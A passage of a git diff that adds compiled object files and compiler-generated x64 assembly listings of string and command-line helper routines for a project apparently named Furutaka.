index 0000000..8ff287a
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/_strlen.obj differ
diff --git a/Source/Furutaka/output/x64/Release/_strncmpi.obj b/Source/Furutaka/output/x64/Release/_strncmpi.obj
new file mode 100644
index 0000000..bd6133b
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/_strncmpi.obj differ
diff --git a/Source/Furutaka/output/x64/Release/asmlist/_strcat.asm b/Source/Furutaka/output/x64/Release/asmlist/_strcat.asm
new file mode 100644
index 0000000..985cf39
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/_strcat.asm
@@ -0,0 +1,96 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC _strcat_a
+PUBLIC _strcat_w
+; Function compile flags: /Ogspy
+; COMDAT _strcat_w
+_TEXT SEGMENT
+dest$ = 8
+src$ = 16
+_strcat_w PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strcat.c
+; Line 23
+ xor r8d, r8d
+ test rcx, rcx
+ je SHORT $LN7@strcat_w
+ test rdx, rdx
+ je SHORT $LN7@strcat_w
+ jmp SHORT $LN17@strcat_w
+$LL2@strcat_w:
+; Line 27
+ add rcx, 2
+$LN17@strcat_w:
+; Line 26
+ cmp WORD PTR [rcx], r8w
+ jne SHORT $LL2@strcat_w
+; Line 29
+ movzx eax, WORD PTR [rdx]
+ test ax, ax
+ je SHORT $LN5@strcat_w
+ sub rdx, rcx
+$LL4@strcat_w:
+; Line 30
+ mov WORD PTR [rcx], ax
+; Line 31
+ add rcx, 2
+ movzx eax, WORD PTR [rdx+rcx]
+ test ax, ax
+ jne SHORT $LL4@strcat_w
+$LN5@strcat_w:
+; Line 35
+ mov WORD PTR [rcx], r8w
+$LN7@strcat_w:
+; Line 37
+ mov rax, rcx
+ ret 0
+_strcat_w ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT _strcat_a
+_TEXT SEGMENT
+dest$ = 8
+src$ = 16
+_strcat_a PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strcat.c
+; Line 5
+ xor r8d, r8d
+ test rcx, rcx
+ je SHORT $LN7@strcat_a
+ test rdx, rdx
+ je SHORT $LN7@strcat_a
+ jmp SHORT $LN17@strcat_a
+$LL2@strcat_a:
+; Line 9
+ inc rcx
+$LN17@strcat_a:
+; Line 8
+ cmp BYTE PTR [rcx], r8b
+ jne SHORT $LL2@strcat_a
+; Line 11
+ mov al, BYTE PTR [rdx]
+ test al, al
+ je SHORT $LN5@strcat_a
+ sub rdx, rcx
+$LL4@strcat_a:
+; Line 12
+ mov BYTE PTR [rcx], al
+; Line 13
+ inc rcx
+ mov al, BYTE PTR [rdx+rcx]
+ test al, al
+ jne SHORT $LL4@strcat_a
+$LN5@strcat_a:
+; Line 17
+ mov BYTE PTR [rcx], r8b
+$LN7@strcat_a:
+; Line 19
+ mov rax, rcx
+ ret 0
+_strcat_a ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/asmlist/_strcmpi.asm b/Source/Furutaka/output/x64/Release/asmlist/_strcmpi.asm
new file mode 100644
index 0000000..4385afe
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/_strcmpi.asm
@@ -0,0 +1,159 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC _strcmpi_a
+PUBLIC _strcmpi_w
+; Function compile flags: /Ogspy
+; COMDAT _strcmpi_w
+_TEXT SEGMENT
+s1$ = 8
+s2$ = 16
+_strcmpi_w PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strcmpi.c
+; Line 30
+ cmp rcx, rdx
+ jne SHORT $LN5@strcmpi_w
+; Line 31
+ xor eax, eax
+; Line 47
+ ret 0
+$LN5@strcmpi_w:
+; Line 33
+ test rcx, rcx
+ jne SHORT $LN6@strcmpi_w
+; Line 34
+ or eax, -1
+; Line 47
+ ret 0
+$LN6@strcmpi_w:
+; Line 36
+ test rdx, rdx
+ jne SHORT $LN23@strcmpi_w
+; Line 37
+ lea eax, QWORD PTR [rdx+1]
+; Line 47
+ ret 0
+$LN23@strcmpi_w:
+ sub rcx, rdx
+$LL4@strcmpi_w:
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\rtltypes.h
+; Line 25
+ movzx eax, WORD PTR [rcx+rdx]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strcmpi.c
+; Line 41
+ movzx r8d, WORD PTR [rcx+rdx]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\rtltypes.h
+; Line 25
+ sub ax, 65 ; 00000041H
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strcmpi.c
+; Line 43
+ movzx r9d, WORD PTR [rdx]
+ add r8w, 32 ; 00000020H
+ cmp ax, 25
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\rtltypes.h
+; Line 25
+ movzx eax, WORD PTR [rdx]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strcmpi.c
+; Line 41
+ cmova r8w, WORD PTR [rcx+rdx]
+; Line 43
+ add r9w, 32 ; 00000020H
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\rtltypes.h
+; Line 25
+ sub ax, 65 ; 00000041H
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strcmpi.c
+; Line 43
+ cmp ax, 25
+ cmova r9w, WORD PTR [rdx]
+ lea rdx, QWORD PTR [rdx+2]
+; Line 44
+ test r8w, r8w
+ je SHORT $LN8@strcmpi_w
+ cmp r8w, r9w
+ je SHORT $LL4@strcmpi_w
+$LN8@strcmpi_w:
+; Line 46
+ movzx ecx, r9w
+ movzx eax, r8w
+ sub eax, ecx
+; Line 47
+ ret 0
+_strcmpi_w ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT _strcmpi_a
+_TEXT SEGMENT
+s1$ = 8
+s2$ = 16
+_strcmpi_a PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strcmpi.c
+; Line 4
+ mov r9, rdx
+ mov r8, rcx
+; Line 7
+ cmp rcx, rdx
+ jne SHORT $LN5@strcmpi_a
+; Line 8
+ xor eax, eax
+; Line 24
+ ret 0
+$LN5@strcmpi_a:
+; Line 10
+ test r8, r8
+ jne SHORT $LN6@strcmpi_a
+; Line 11
+ or eax, -1
+; Line 24
+ ret 0
+$LN6@strcmpi_a:
+; Line 13
+ test rdx, rdx
+ jne SHORT $LN23@strcmpi_a
+; Line 14
+ lea eax, QWORD PTR [rdx+1]
+; Line 24
+ ret 0
+$LN23@strcmpi_a:
+ sub r8, rdx
+$LL4@strcmpi_a:
+; Line 17
+ movzx edx, BYTE PTR [r8+r9]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\rtltypes.h
+; Line 17
+ lea ecx, DWORD PTR [rdx-65]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strcmpi.c
+; Line 18
+ cmp cl, 25
+ lea eax, DWORD PTR [rdx+32]
+ movzx r10d, al
+ cmova r10d, edx
+ movzx edx, BYTE PTR [r9]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\rtltypes.h
+; Line 17
+ lea ecx, DWORD PTR [rdx-65]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strcmpi.c
+; Line 20
+ cmp cl, 25
+ lea eax, DWORD PTR [rdx+32]
+ movzx r11d, al
+ cmova r11d, edx
+ inc r9
+; Line 21
+ test r10b, r10b
+ je SHORT $LN8@strcmpi_a
+ cmp r10b, r11b
+ je SHORT $LL4@strcmpi_a
+$LN8@strcmpi_a:
+; Line 23
+ movsx ecx, r11b
+ movsx eax, r10b
+ sub eax, ecx
+; Line 24
+ ret 0
+_strcmpi_a ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/asmlist/_strcpy.asm b/Source/Furutaka/output/x64/Release/asmlist/_strcpy.asm
new file mode 100644
index 0000000..b2e801a
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/_strcpy.asm
@@ -0,0 +1,87 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC _strcpy_a
+PUBLIC _strcpy_w
+; Function compile flags: /Ogspy
+; COMDAT _strcpy_w
+_TEXT SEGMENT
+dest$ = 8
+src$ = 16
+_strcpy_w PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strcpy.c
+; Line 28
+ xor r9d, r9d
+ test rcx, rcx
+ je SHORT $LN5@strcpy_w
+ test rdx, rdx
+ je SHORT $LN5@strcpy_w
+; Line 31
+ cmp rcx, rdx
+ je SHORT $LN5@strcpy_w
+; Line 35
+ movzx r8d, WORD PTR [rdx]
+ mov rax, rcx
+ test r8w, r8w
+ je SHORT $LN3@strcpy_w
+ sub rdx, rcx
+$LL2@strcpy_w:
+; Line 36
+ mov WORD PTR [rax], r8w
+; Line 37
+ add rax, 2
+ movzx r8d, WORD PTR [rdx+rax]
+ test r8w, r8w
+ jne SHORT $LL2@strcpy_w
+$LN3@strcpy_w:
+; Line 41
+ mov WORD PTR [rax], r9w
+$LN5@strcpy_w:
+; Line 43
+ mov rax, rcx
+ ret 0
+_strcpy_w ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT _strcpy_a
+_TEXT SEGMENT
+dest$ = 8
+src$ = 16
+_strcpy_a PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strcpy.c
+; Line 7
+ test rcx, rcx
+ je SHORT $LN5@strcpy_a
+ test rdx, rdx
+ je SHORT $LN5@strcpy_a
+; Line 10
+ cmp rcx, rdx
+ je SHORT $LN5@strcpy_a
+; Line 14
+ mov r8b, BYTE PTR [rdx]
+ mov rax, rcx
+ test r8b, r8b
+ je SHORT $LN3@strcpy_a
+ sub rdx, rcx
+$LL2@strcpy_a:
+; Line 15
+ mov BYTE PTR [rax], r8b
+; Line 16
+ inc rax
+ mov r8b, BYTE PTR [rdx+rax]
+ test r8b, r8b
+ jne SHORT $LL2@strcpy_a
+$LN3@strcpy_a:
+; Line 20
+ mov BYTE PTR [rax], 0
+$LN5@strcpy_a:
+; Line 22
+ mov rax, rcx
+ ret 0
+_strcpy_a ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/asmlist/_strend.asm b/Source/Furutaka/output/x64/Release/asmlist/_strend.asm
new file mode 100644
index 0000000..ba1d200
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/_strend.asm
@@ -0,0 +1,61 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC _strend_a
+PUBLIC _strend_w
+; Function compile flags: /Ogspy
+; COMDAT _strend_w
+_TEXT SEGMENT
+s$ = 8
+_strend_w PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strend.c
+; Line 16
+ xor eax, eax
+ test rcx, rcx
+ je SHORT $LN1@strend_w
+ jmp SHORT $LN10@strend_w
+$LL2@strend_w:
+; Line 20
+ add rcx, 2
+$LN10@strend_w:
+; Line 19
+ cmp WORD PTR [rcx], ax
+ jne SHORT $LL2@strend_w
+; Line 22
+ mov rax, rcx
+$LN1@strend_w:
+; Line 23
+ ret 0
+_strend_w ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT _strend_a
+_TEXT SEGMENT
+s$ = 8
+_strend_a PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strend.c
+; Line 5
+ test rcx, rcx
+ jne SHORT $LN10@strend_a
+; Line 6
+ xor eax, eax
+; Line 12
+ ret 0
+$LL2@strend_a:
+; Line 9
+ inc rcx
+$LN10@strend_a:
+; Line 8
+ cmp BYTE PTR [rcx], 0
+ jne SHORT $LL2@strend_a
+; Line 11
+ mov rax, rcx
+; Line 12
+ ret 0
+_strend_a ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/asmlist/_strlen.asm b/Source/Furutaka/output/x64/Release/asmlist/_strlen.asm
new file mode 100644
index 0000000..5da405a
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/_strlen.asm
@@ -0,0 +1,65 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC _strlen_a
+PUBLIC _strlen_w
+; Function compile flags: /Ogspy
+; COMDAT _strlen_w
+_TEXT SEGMENT
+s$ = 8
+_strlen_w PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strlen.c
+; Line 20
+ xor edx, edx
+ mov rax, rcx
+ test rcx, rcx
+ jne SHORT $LN10@strlen_w
+; Line 27
+ ret 0
+$LL2@strlen_w:
+; Line 24
+ add rcx, 2
+$LN10@strlen_w:
+; Line 23
+ cmp WORD PTR [rcx], dx
+ jne SHORT $LL2@strlen_w
+; Line 26
+ sub rcx, rax
+ sar rcx, 1
+ mov rax, rcx
+; Line 27
+ ret 0
+_strlen_w ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT _strlen_a
+_TEXT SEGMENT
+s$ = 8
+_strlen_a PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strlen.c
+; Line 5
+ mov rax, rcx
+; Line 7
+ test rcx, rcx
+ jne SHORT $LN10@strlen_a
+; Line 14
+ ret 0
+$LL2@strlen_a:
+; Line 11
+ inc rcx
+$LN10@strlen_a:
+; Line 10
+ cmp BYTE PTR [rcx], 0
+ jne SHORT $LL2@strlen_a
+; Line 13
+ sub rcx, rax
+ mov rax, rcx
+; Line 14
+ ret 0
+_strlen_a ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/asmlist/_strncmpi.asm b/Source/Furutaka/output/x64/Release/asmlist/_strncmpi.asm
new file mode 100644
index 0000000..fdc4663
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/_strncmpi.asm
@@ -0,0 +1,174 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC _strncmpi_a
+PUBLIC _strncmpi_w
+; Function compile flags: /Ogspy
+; COMDAT _strncmpi_w
+_TEXT SEGMENT
+s1$ = 8
+s2$ = 16
+cchars$ = 24
+_strncmpi_w PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strncmpi.c
+; Line 34
+ cmp rcx, rdx
+ je SHORT $LN25@strncmpi_w
+; Line 37
+ test rcx, rcx
+ jne SHORT $LN6@strncmpi_w
+; Line 38
+ or eax, -1
+; Line 55
+ ret 0
+$LN6@strncmpi_w:
+; Line 40
+ test rdx, rdx
+ jne SHORT $LN7@strncmpi_w
+; Line 41
+ lea eax, QWORD PTR [rdx+1]
+; Line 55
+ ret 0
+$LN7@strncmpi_w:
+; Line 43
+ test r8, r8
+ je SHORT $LN25@strncmpi_w
+ sub rcx, rdx
+$LL4@strncmpi_w:
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\rtltypes.h
+; Line 25
+ movzx eax, WORD PTR [rcx+rdx]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strncmpi.c
+; Line 48
+ movzx r9d, WORD PTR [rcx+rdx]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\rtltypes.h
+; Line 25
+ sub ax, 65 ; 00000041H
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strncmpi.c
+; Line 50
+ movzx r10d, WORD PTR [rdx]
+ add r9w, 32 ; 00000020H
+ cmp ax, 25
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\rtltypes.h
+; Line 25
+ movzx eax, WORD PTR [rdx]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strncmpi.c
+; Line 48
+ cmova r9w, WORD PTR [rcx+rdx]
+; Line 50
+ add r10w, 32 ; 00000020H
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\rtltypes.h
+; Line 25
+ sub ax, 65 ; 00000041H
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strncmpi.c
+; Line 50
+ cmp ax, 25
+ cmova r10w, WORD PTR [rdx]
+; Line 51
+ dec r8
+ lea rdx, QWORD PTR [rdx+2]
+; Line 52
+ test r9w, r9w
+ je SHORT $LN9@strncmpi_w
+ cmp r9w, r10w
+ jne SHORT $LN9@strncmpi_w
+ test r8, r8
+ jne SHORT $LL4@strncmpi_w
+$LN9@strncmpi_w:
+; Line 54
+ movzx ecx, r10w
+ movzx eax, r9w
+ sub eax, ecx
+; Line 55
+ ret 0
+$LN25@strncmpi_w:
+; Line 44
+ xor eax, eax
+; Line 55
+ ret 0
+_strncmpi_w ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT _strncmpi_a
+_TEXT SEGMENT
+s1$ = 8
+s2$ = 16
+cchars$ = 24
+_strncmpi_a PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strncmpi.c
+; Line 4
+ mov r10, rdx
+ mov r9, rcx
+; Line 7
+ cmp rcx, rdx
+ je SHORT $LN25@strncmpi_a
+; Line 10
+ test rcx, rcx
+ jne SHORT $LN6@strncmpi_a
+; Line 11
+ or eax, -1
+; Line 28
+ ret 0
+$LN6@strncmpi_a:
+; Line 13
+ test rdx, rdx
+ jne SHORT $LN7@strncmpi_a
+; Line 14
+ lea eax, QWORD PTR [rdx+1]
+; Line 28
+ ret 0
+$LN7@strncmpi_a:
+; Line 16
+ test r8, r8
+ je SHORT $LN25@strncmpi_a
+ sub r9, rdx
+$LL4@strncmpi_a:
+; Line 20
+ movzx edx, BYTE PTR [r9+r10]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\rtltypes.h
+; Line 17
+ lea ecx, DWORD PTR [rdx-65]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strncmpi.c
+; Line 21
+ cmp cl, 25
+ lea eax, DWORD PTR [rdx+32]
+ movzx r11d, al
+ cmova r11d, edx
+ movzx edx, BYTE PTR [r10]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\rtltypes.h
+; Line 17
+ lea ecx, DWORD PTR [rdx-65]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\_strncmpi.c
+; Line 23
+ cmp cl, 25
+ lea eax, DWORD PTR [rdx+32]
+ cmova eax, edx
+ inc r10
+; Line 24
+ dec r8
+; Line 25
+ test r11b, r11b
+ je SHORT $LN9@strncmpi_a
+ cmp r11b, al
+ jne SHORT $LN9@strncmpi_a
+ test r8, r8
+ jne SHORT $LL4@strncmpi_a
+$LN9@strncmpi_a:
+; Line 27
+ movsx ecx, al
+ movsx eax, r11b
+ sub eax, ecx
+; Line 28
+ ret 0
+$LN25@strncmpi_a:
+; Line 17
+ xor eax, eax
+; Line 28
+ ret 0
+_strncmpi_a ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/asmlist/cmdline.asm b/Source/Furutaka/output/x64/Release/asmlist/cmdline.asm
new file mode 100644
index 0000000..e966c41
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/cmdline.asm
@@ -0,0 +1,434 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC GetCommandLineParamW
+PUBLIC GetCommandLineParamA
+PUBLIC ExtractFilePathA
+PUBLIC ExtractFilePathW
+; COMDAT pdata
+pdata SEGMENT
+$pdata$GetCommandLineParamW DD imagerel $LN42
+ DD imagerel $LN42+275
+ DD imagerel $unwind$GetCommandLineParamW
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$GetCommandLineParamA DD imagerel $LN41
+ DD imagerel $LN41+226
+ DD imagerel $unwind$GetCommandLineParamA
+pdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$GetCommandLineParamA DD 081301H
+ DD 047413H
+ DD 03640fH
+ DD 02540bH
+ DD 013407H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$GetCommandLineParamW DD 0a1701H
+ DD 067417H
+ DD 056417H
+ DD 045417H
+ DD 033417H
+ DD 0e015f017H
+xdata ENDS
+; Function compile flags: /Ogspy
+; COMDAT ExtractFilePathW
+_TEXT SEGMENT
+FileName$ = 8
+FilePath$ = 16
+ExtractFilePathW PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\cmdline.c
+; Line 162
+ xor r11d, r11d
+ mov r9, rcx
+ mov r8, rcx
+ test rcx, rcx
+ je SHORT $LN7@ExtractFil
+ test rdx, rdx
+ je SHORT $LN7@ExtractFil
+; Line 165
+ movzx r10d, WORD PTR [rcx]
+ test r10w, r10w
+ je SHORT $LN5@ExtractFil
+$LL2@ExtractFil:
+; Line 168
+ add rcx, 2
+ cmp r10w, 92 ; 0000005cH
+ mov rax, rcx
+ cmovne rax, r9
+ movzx r10d, WORD PTR [rcx]
+ mov r9, rax
+ test r10w, r10w
+ jne SHORT $LL2@ExtractFil
+; Line 165
+ jmp SHORT $LN20@ExtractFil
+$LL14@ExtractFil:
+; Line 172
+ movzx eax, WORD PTR [r8]
+ mov WORD PTR [rdx], ax
+; Line 173
+ add rdx, 2
+; Line 174
+ add r8, 2
+$LN20@ExtractFil:
+; Line 171
+ cmp r8, r9
+ jb SHORT $LL14@ExtractFil
+$LN5@ExtractFil:
+; Line 177
+ mov WORD PTR [rdx], r11w
+; Line 179
+ mov rax, rdx
+; Line 180
+ ret 0
+$LN7@ExtractFil:
+; Line 163
+ xor eax, eax
+; Line 180
+ ret 0
+ExtractFilePathW ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT ExtractFilePathA
+_TEXT SEGMENT
+FileName$ = 8
+FilePath$ = 16
+ExtractFilePathA PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\cmdline.c
+; Line 136
+ mov r9, rcx
+ mov r8, rcx
+; Line 138
+ test rcx, rcx
+ je SHORT $LN7@ExtractFil
+ test rdx, rdx
+ je SHORT $LN7@ExtractFil
+; Line 141
+ mov r10b, BYTE PTR [rcx]
+ test r10b, r10b
+ je SHORT $LN5@ExtractFil
+$LL2@ExtractFil:
+; Line 144
+ inc rcx
+ cmp r10b, 92 ; 0000005cH
+ mov rax, rcx
+ cmovne rax, r9
+ mov r10b, BYTE PTR [rcx]
+ mov r9, rax
+ test r10b, r10b
+ jne SHORT $LL2@ExtractFil
+; Line 141
+ jmp SHORT $LN20@ExtractFil
+$LL14@ExtractFil:
+; Line 148
+ mov al, BYTE PTR [r8]
+ mov BYTE PTR [rdx], al
+; Line 149
+ inc rdx
+; Line 150
+ inc r8
+$LN20@ExtractFil:
+; Line 147
+ cmp r8, r9
+ jb SHORT $LL14@ExtractFil
+$LN5@ExtractFil:
+; Line 153
+ mov BYTE PTR [rdx], 0
+; Line 155
+ mov rax, rdx
+; Line 156
+ ret 0
+$LN7@ExtractFil:
+; Line 139
+ xor eax, eax
+; Line 156
+ ret 0
+ExtractFilePathA ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT GetCommandLineParamA
+_TEXT SEGMENT
+CmdLine$ = 8
+ParamIndex$ = 16
+Buffer$ = 24
+BufferSize$ = 32
+ParamLen$ = 40
+GetCommandLineParamA PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\cmdline.c
+; Line 77
+$LN41:
+ mov rax, rsp
+ mov QWORD PTR [rax+8], rbx
+ mov QWORD PTR [rax+16], rbp
+ mov QWORD PTR [rax+24], rsi
+ mov QWORD PTR [rax+32], rdi
+ mov ebx, r9d
+ mov ebp, edx
+ mov r10, rcx
+; Line 81
+ test rcx, rcx
+ je $LN21@GetCommand
+; Line 84
+ mov r11, QWORD PTR ParamLen$[rsp]
+ test r11, r11
+ je SHORT $LN12@GetCommand
+; Line 85
+ and DWORD PTR [r11], 0
+$LN12@GetCommand:
+; Line 87
+ xor esi, esi
+$LL4@GetCommand:
+; Line 88
+ xor r9d, r9d
+; Line 90
+ jmp SHORT $LN39@GetCommand
+$LL5@GetCommand:
+; Line 91
+ inc r10
+$LN39@GetCommand:
+; Line 90
+ mov cl, BYTE PTR [r10]
+ cmp cl, 32 ; 00000020H
+ je SHORT $LL5@GetCommand
+; Line 93
+ test cl, cl
+ je SHORT $zero_term_exit$42
+ cmp cl, 34 ; 00000022H
+ je SHORT $LN14@GetCommand
+; Line 103
+ mov edi, 32 ; 00000020H
+ jmp SHORT $LN36@GetCommand
+$LN14@GetCommand:
+; Line 98
+ inc r10
+; Line 106
+ mov edi, 34 ; 00000022H
+ mov cl, BYTE PTR [r10]
+ cmp cl, dil
+ je SHORT $LN10@GetCommand
+$LN36@GetCommand:
+ mov dl, cl
+$LL9@GetCommand:
+ movsx eax, dl
+ mov cl, dl
+ cmp eax, edi
+ je SHORT $LN10@GetCommand
+ test dl, dl
+ je SHORT $LN10@GetCommand
+; Line 107
+ inc r9d
+; Line 108
+ cmp esi, ebp
+ jne SHORT $LN17@GetCommand
+; Line 109
+ cmp r9d, ebx
+ jae SHORT $LN17@GetCommand
+ test r8, r8
+ je SHORT $LN17@GetCommand
+; Line 110
+ mov BYTE PTR [r8], dl
+; Line 111
+ inc r8
+$LN17@GetCommand:
+; Line 113
+ inc r10
+ mov cl, BYTE PTR [r10]
+ mov dl, cl
+ cmp cl, 34 ; 00000022H
+ jne SHORT $LL9@GetCommand
+$LN10@GetCommand:
+; Line 87
+ inc esi
+ lea rax, QWORD PTR [r10+1]
+ test cl, cl
+ cmove rax, r10
+ mov r10, rax
+ cmp esi, ebp
+ jbe SHORT $LL4@GetCommand
+$zero_term_exit$42:
+; Line 122
+ test r8, r8
+ je SHORT $LN19@GetCommand
+ test ebx, ebx
+ je SHORT $LN19@GetCommand
+; Line 123
+ mov BYTE PTR [r8], 0
+$LN19@GetCommand:
+; Line 125
+ test r11, r11
+ je SHORT $LN20@GetCommand
+; Line 126
+ mov DWORD PTR [r11], r9d
+$LN20@GetCommand:
+; Line 128
+ cmp r9d, ebx
+ jae SHORT $LN21@GetCommand
+; Line 129
+ mov eax, 1
+ jmp SHORT $LN22@GetCommand
+$LN21@GetCommand:
+; Line 131
+ xor eax, eax
+$LN22@GetCommand:
+; Line 132
+ mov rbx, QWORD PTR [rsp+8]
+ mov rbp, QWORD PTR [rsp+16]
+ mov rsi, QWORD PTR [rsp+24]
+ mov rdi, QWORD PTR [rsp+32]
+ ret 0
+GetCommandLineParamA ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT GetCommandLineParamW
+_TEXT SEGMENT
+CmdLine$ = 24
+ParamIndex$ = 32
+Buffer$ = 40
+BufferSize$ = 48
+ParamLen$ = 56
+GetCommandLineParamW PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\cmdline.c
+; Line 10
+$LN42:
+ mov rax, rsp
+ mov QWORD PTR [rax+8], rbx
+ mov QWORD PTR [rax+16], rbp
+ mov QWORD PTR [rax+24], rsi
+ mov QWORD PTR [rax+32], rdi
+ push r14
+ push r15
+; Line 14
+ mov r11, QWORD PTR ParamLen$[rsp]
+ xor ebp, ebp
+ mov esi, edx
+ mov r10, rcx
+ test r11, r11
+ je SHORT $LN11@GetCommand
+; Line 15
+ mov DWORD PTR [r11], ebp
+$LN11@GetCommand:
+; Line 17
+ test rcx, rcx
+ jne SHORT $LN12@GetCommand
+; Line 18
+ test r8, r8
+ je SHORT $LN22@GetCommand
+ test r9d, r9d
+ je SHORT $LN22@GetCommand
+; Line 19
+ mov WORD PTR [r8], bp
+$LN22@GetCommand:
+; Line 67
+ xor eax, eax
+$LN23@GetCommand:
+; Line 68
+ mov rbx, QWORD PTR [rsp+24]
+ mov rbp, QWORD PTR [rsp+32]
+ mov rsi, QWORD PTR [rsp+40]
+ mov rdi, QWORD PTR [rsp+48]
+ pop r15
+ pop r14
+ ret 0
+$LN12@GetCommand:
+; Line 23
+ mov r14d, 32 ; 00000020H
+ mov ebx, ebp
+ lea r15d, QWORD PTR [r14+2]
+$LL4@GetCommand:
+; Line 24
+ mov edx, ebp
+; Line 26
+ jmp SHORT $LN40@GetCommand
+$LL5@GetCommand:
+; Line 27
+ add r10, 2
+$LN40@GetCommand:
+; Line 26
+ movzx ecx, WORD PTR [r10]
+ cmp cx, r14w
+ je SHORT $LL5@GetCommand
+; Line 29
+ test cx, cx
+ je SHORT $zero_term_exit$43
+ cmp cx, r15w
+ je SHORT $LN15@GetCommand
+; Line 39
+ movzx edi, r14w
+ jmp SHORT $LN37@GetCommand
+$LN15@GetCommand:
+; Line 34
+ add r10, 2
+; Line 42
+ mov edi, r15d
+ movzx ecx, WORD PTR [r10]
+ cmp cx, r15w
+ je SHORT $LN10@GetCommand
